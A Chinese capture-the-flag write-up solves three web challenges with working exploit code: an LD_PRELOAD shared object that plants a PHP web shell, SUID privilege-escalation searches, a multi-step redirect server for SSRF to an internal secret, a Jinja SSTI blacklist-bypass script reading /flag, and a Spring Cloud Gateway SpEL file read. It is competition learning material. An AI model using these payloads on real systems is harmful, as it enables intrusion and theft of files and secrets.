强网拟态2025初赛 Web Writeup
Contents
smallcode
<?php
highlight_file(__FILE__);
if(isset($_POST['context'])){
$context = $_POST['context'];
file_put_contents("1.txt",base64_decode($context));
}
if(isset($_POST['env'])){
$env = $_POST['env'];
putenv($env);
}
system("nohup wget --content-disposition -N hhhh &");写so,编译
#include <stdlib.h>
#include <unistd.h>
__attribute__ ((__constructor__)) void init(void){
// 防止递归加载
unsetenv("LD_PRELOAD");
system("printf \"<?php if(isset(\\$_POST['cmd'])){system(\\$_POST['cmd']);} ?>\" > /var/www/html/shell.php");
}把so文件内容base64编码后上传

加载
env=LD_PRELOAD=/var/www/html/1.txt在/var/www/html写shell.php,但是读flag需要提权
find / -perm -u=s -type f 2>/dev/null
nl /flag
safesecret
from flask import Flask, request, jsonify, Response, abort, render_template_string, session
import requests, re
from urllib.parse import urljoin, urlparse
app = Flask(__name__)
MAX_TOTAL_STEPS = 30
ERROR_COUNT = 6
META_REFRESH_RE = re.compile(
r'<meta\s+http-equiv=["\']refresh["\']\s+content=["\']\s*\d+\s*;\s*url=([^"\']+)["\']',
re.IGNORECASE
)
def read(f): return open(f).read()
SECRET = read("/secret").strip()
app.secret_key = "a_test_secret"
def sset(key, value):
session[key] = value
return ""
def sget(key, default=None):
return session.get(key, default)
app.jinja_env.globals.update(sget=sget)
app.jinja_env.globals.update(sset=sset)
@app.route("/_internal/secret")
def internal_flag():
if request.remote_addr not in ("127.0.0.1", "::1"):
abort(403)
body = f'OK Secret: {SECRET}'
return Response(body, mimetype="application/json")
@app.route("/")
def index():
return "welcome"
def _next_by_refresh_header(r, current_url):
refresh = r.headers.get("Refresh")
if not refresh:
return None
try:
part = refresh.split(";", 1)[1]
k, v = part.split("=", 1)
if k.strip().lower() == "url":
return urljoin(current_url, v.strip())
except Exception:
return None
def _next_by_meta_refresh(r, current_url):
m = META_REFRESH_RE.search(r.text[:5000])
if m:
return urljoin(current_url, m.group(1).strip())
return None
def _next_by_authlike_header(r, current_url):
if r.status_code in (401, 407, 429):
nxt = r.headers.get("X-Next")
if nxt:
return urljoin(current_url, nxt)
return None
def my_fetch(url):
session = requests.Session()
current_url = url
count_redirect = 0
history = []
last_resp = None
while count_redirect < MAX_TOTAL_STEPS:
print(count_redirect)
try:
r = session.get(current_url, allow_redirects=False, timeout=5)
print(r.text)
except Exception as e:
return history, None, f"Upstream request failed: {e}"
last_resp = r
history.append({
"url": current_url,
"status": r.status_code,
"headers": dict(r.headers),
"body_preview": r.text[:800]
})
nxt = _next_by_refresh_header(r, current_url)
if nxt:
current_url = nxt
count_redirect += 1
continue
nxt = _next_by_meta_refresh(r, current_url)
if nxt:
current_url = nxt
count_redirect += 1
continue
nxt = _next_by_authlike_header(r, current_url)
if nxt:
current_url = nxt
count_redirect += 1
continue
break
return history, last_resp, None
@app.route("/fetch")
def fetch():
target = request.args.get("url")
if not target:
return jsonify({"error": "no url"}), 400
history, last_resp, err = my_fetch(target)
if err:
return jsonify({"error": err}), 502
if not last_resp:
return jsonify({"error": "no response"}), 502
walked_steps = len(history) - 1
try:
if "application/json" in (last_resp.headers.get("Content-Type") or "").lower():
_ = last_resp.json()
else:
if "MUST_HAVE_FIELD" not in last_resp.text:
raise ValueError("JSON schema mismatch")
return jsonify({"ok": True, "len": len(last_resp.text)})
except Exception as parse_err:
if walked_steps >= ERROR_COUNT:
raw = []
raw.append(last_resp.text[:5000])
return Response("\n".join(raw), mimetype="text/plain", status=500)
else:
return jsonify({"error": "Invalid JSON"}), 500
@app.route("/login")
def login():
username = request.args.get("username")
secret = request.args.get("secret", "")
blacklist = ["config", "_", "read", "{{"]
if secret != SECRET:
return ("forbidden", 403)
if len(username) > 47:
return ("username too long", 400)
if any([n in username.lower() for n in blacklist]):
return ("forbidden", 403)
sset('username', username)
rendered = render_template_string("Welcome: " + username)
return rendered
if __name__ == "__main__":
app.run(host="0.0.0.0", port=5000)需要进行七次重定向
ai写个Exp,放vps上
from http.server import HTTPServer, BaseHTTPRequestHandler
class RefreshRedirectHandler(BaseHTTPRequestHandler):
def do_GET(self):
print(f"Request: {self.path}")
if self.path == '/start':
self.send_response(200)
self.send_header('Refresh', '0; url=/step1')
self.end_headers()
self.wfile.write(b'Redirecting...')
elif self.path == '/step1':
self.send_response(200)
self.send_header('Refresh', '0; url=/step2')
self.end_headers()
self.wfile.write(b'Redirecting...')
elif self.path == '/step2':
self.send_response(200)
self.send_header('Refresh', '0; url=/step3')
self.end_headers()
self.wfile.write(b'Redirecting...')
elif self.path == '/step3':
self.send_response(200)
self.send_header('Refresh', '0; url=/step4')
self.end_headers()
self.wfile.write(b'Redirecting...')
elif self.path == '/step4':
self.send_response(200)
self.send_header('Refresh', '0; url=/step5')
self.end_headers()
self.wfile.write(b'Redirecting...')
elif self.path == '/step5':
self.send_response(200)
self.send_header('Refresh', '0; url=/step6')
self.end_headers()
self.wfile.write(b'Redirecting...')
elif self.path == '/step6':
self.send_response(200)
self.send_header('Refresh', '0; url=http://127.0.0.1:5000/_internal/secret')
self.end_headers()
self.wfile.write(b'Final redirect...')
else:
self.send_response(404)
self.end_headers()
self.wfile.write(b'Not Found')
def log_message(self, format, *args):
print(f"LOG: {format % args}")
if __name__ == '__main__':
server = HTTPServer(('0.0.0.0', 8000), RefreshRedirectHandler)
print('Starting Refresh header redirect server on port 8000...')
server.serve_forever()访问/fetch?url=http://vps:port/start即可

拿到Secret: 1140457d-a0b5-4e6d-a423-5a676e61992a
login?secret=1140457d-a0b5-4e6d-a423-5a676e61992a&username={%print(1)%}下面就需要绕ssti黑名单和长度限制
这里过滤了config,那么就不能用config.update,如果要打继承链的话需要一个全局字典
可以看到

我们可以通过sset设置session中的键值对,再用sget获取session的值
构造出来
sget['__globals__']['read']('/flag')
#等价于read('/flag')实际上就是通过globals获取到read函数,再通过read函数去读取/flag
import requests
import re
url = "http://web-aff0e10d2f.challenge.xctf.org.cn/"
secret_key = "1140457d-a0b5-4e6d-a423-5a676e61992a"
def exp():
login_url = url + "login"
s = requests.session()
payloads = [
{"username": "{%print sset('g',request.args.g)%}", "g": "__globals__"},
{"username": "{%print sset('r',request.args.r)%}", "r": "read"},
{"username": "{%print sset('f',request.args.f)%}", "f": "/flag"}
]
for payload in payloads:
s.get(login_url, params={"secret": secret_key, **payload})
payload4 = {
"secret": secret_key,
"username": "{%print sget[sget('g')][sget('r')](sget('f'))%}",
}
res = s.get(login_url, params=payload4)
result = res.text
print(result)
if "flag{" in result:
flag_match = re.search(r"flag\{[^}]+\}", result)
if flag_match:
print(f"\n找到FLAG: {flag_match.group(0)}")
if __name__ == "__main__":
exp()
ezcloud
扫目录发现有actuator接口泄露
发现spring cloud getway,最近刚爆出SpeL漏洞
然后参考https://rce.moe/2025/09/29/CVE-2025-41243/文章里面的文件读取即可读取flag


每次设置完路由post访问refresh进行更新


将路由设置到根目录后然后访问/webjars/flag
